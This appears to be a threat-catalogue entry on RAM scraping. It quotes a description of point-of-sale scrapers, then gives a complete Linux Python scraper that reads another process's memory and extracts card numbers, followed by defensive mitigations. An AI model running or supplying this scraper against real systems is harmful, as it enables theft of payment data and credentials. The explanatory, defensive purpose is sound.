TID-223: System Susceptible to RAM Scraping
Threat Description
If a threat actor can obtain sufficient privileges on the device, they may be able to install runtime tools that read the contents of some or all of system RAM directly. This gives the actor access to the internal state of other applications running on the device while those applications process potentially sensitive data (e.g., passwords, keys, credentials, financial data, PII), even if that data is never written to a file or database. If the access extends to physical RAM rather than only to the actor's own address space, the actor can also bypass the inter-process isolation boundaries that the operating system enforces between applications.
Threat Maturity and Evidence
Known Exploitable Weakness
How RAM Scrapers Work: The Sneaky Tools Behind the Latest Credit Card Hacks
“There are more than a dozen RAM scrapers sold in the underground market these days. There’s Dexter, Soraya, ChewBacca and BlackPOS to name a few… Once on a targeted system, RAM scrapers work by examining the list of processes that are running on the system and inspecting the memory for data that matches the structure of credit card data, such as the account number, expiration date, and other information stored on a card’s magnetic stripe. Some scrapers are efficient and grab only the golden numbers the attackers seek; others are more sloppy and grab a lot of dirt with their gold.”
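The technique described in the threat description and in the excerpt above (enumerate processes, read their memory, keep only data shaped like card numbers) is small enough to show end to end. The following is an added example written for this page; it is not code from the original page or from the article quoted above, and it uses Linux's /proc/<pid>/maps and /proc/<pid>/mem interfaces as the read path. The sample "heap" contents and the two card-like values in it are constructed (the values are the widely published payment-network test numbers, not real accounts).

```python
"""Minimal RAM scraper of the kind described above (Linux only).

Added example, not code from the original page or the cited article.
Walks a target's readable mappings via /proc/<pid>/maps, reads them through
/proc/<pid>/mem and keeps 13-19 digit runs that pass the Luhn check, the
same filter a scraper uses to separate card numbers from "dirt".
"""
import os
import re
import sys
from typing import Iterator

# A PAN is 13-19 digits not embedded in a longer digit run.  Track-2 data
# ("PAN=YYMM...") puts the PAN directly before '=', which this still matches.
PAN_RE = re.compile(rb"(?<!\d)(\d{13,19})(?!\d)")

# Constructed sample "heap" for the self-test.  The two card-like values are
# the standard public test numbers, not real accounts.
SAMPLE_HEAP = (
    b"\x00\x00user=alice;card=4111111111111111=2512101\x00\x00"
    b"order=1234567890123\x00"          # 13 digits, fails Luhn -> ignored
    b"12345678901234567890\x00"         # 20 digits -> not a PAN, ignored
    b"backup:5555555555554444\x00"
)


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check used by scrapers to discard random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:                    # double every second digit from the right
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def scan_buffer(data: bytes) -> list[str]:
    """Return Luhn-valid PAN candidates found in data, in order, without duplicates."""
    found: list[str] = []
    for m in PAN_RE.finditer(data):
        pan = m.group(1).decode("ascii")
        if pan not in found and luhn_ok(pan):
            found.append(pan)
    return found


def readable_regions(pid: int) -> Iterator[tuple[int, int]]:
    """Yield (start, end) of readable mappings; skip kernel-backed pseudo-maps."""
    with open(f"/proc/{pid}/maps") as maps:
        for line in maps:
            fields = line.split()          # addr perms offset dev inode [path]
            if "r" not in fields[1]:
                continue
            if len(fields) > 5 and fields[5] in ("[vvar]", "[vsyscall]"):
                continue
            start, end = (int(x, 16) for x in fields[0].split("-"))
            yield start, end


def scan_process(pid: int, chunk: int = 1 << 20, overlap: int = 32) -> list[str]:
    """Read every readable mapping of pid through /proc/<pid>/mem and scan it.

    Needs ptrace permission on the target (root/CAP_SYS_PTRACE, or the same
    uid where kernel.yama.ptrace_scope allows it); scanning your own pid works.
    """
    found: list[str] = []
    with open(f"/proc/{pid}/mem", "rb", buffering=0) as mem:
        for start, end in readable_regions(pid):
            tail = b""   # last bytes of the previous chunk, so a PAN split across chunks is still seen
            off = start
            while off < end:
                try:
                    mem.seek(off)
                    data = mem.read(min(chunk, end - off))
                except (OSError, OverflowError):
                    break   # mapping not readable through /proc (e.g. guard page); skip it
                if not data:
                    break
                for pan in scan_buffer(tail + data):
                    if pan not in found:
                        found.append(pan)
                off += len(data)
                tail = data[-overlap:]
    return found


if __name__ == "__main__":
    # Default target is this process, which holds SAMPLE_HEAP in its own heap.
    pid = int(sys.argv[1]) if len(sys.argv) > 1 else os.getpid()
    for pan in scan_process(pid):
        print(f"pid {pid}: {pan[:6]}{'*' * (len(pan) - 10)}{pan[-4:]}")
```

Run it with no argument to scan the interpreter itself and watch the constructed sample number surface from the heap; pass another PID to see how far the read path reaches. Two checks follow directly from this for a defender: on Linux the same read path is gated by ptrace permission (CAP_SYS_PTRACE and the kernel.yama.ptrace_scope sysctl), and a process can mark itself non-dumpable with prctl(PR_SET_DUMPABLE, 0) to close /proc/<pid>/mem to its own uid; and because data "never written to disk" still sits in RAM until overwritten, zeroizing buffers as soon as the sensitive value is no longer needed shrinks the window a scraper has to catch it.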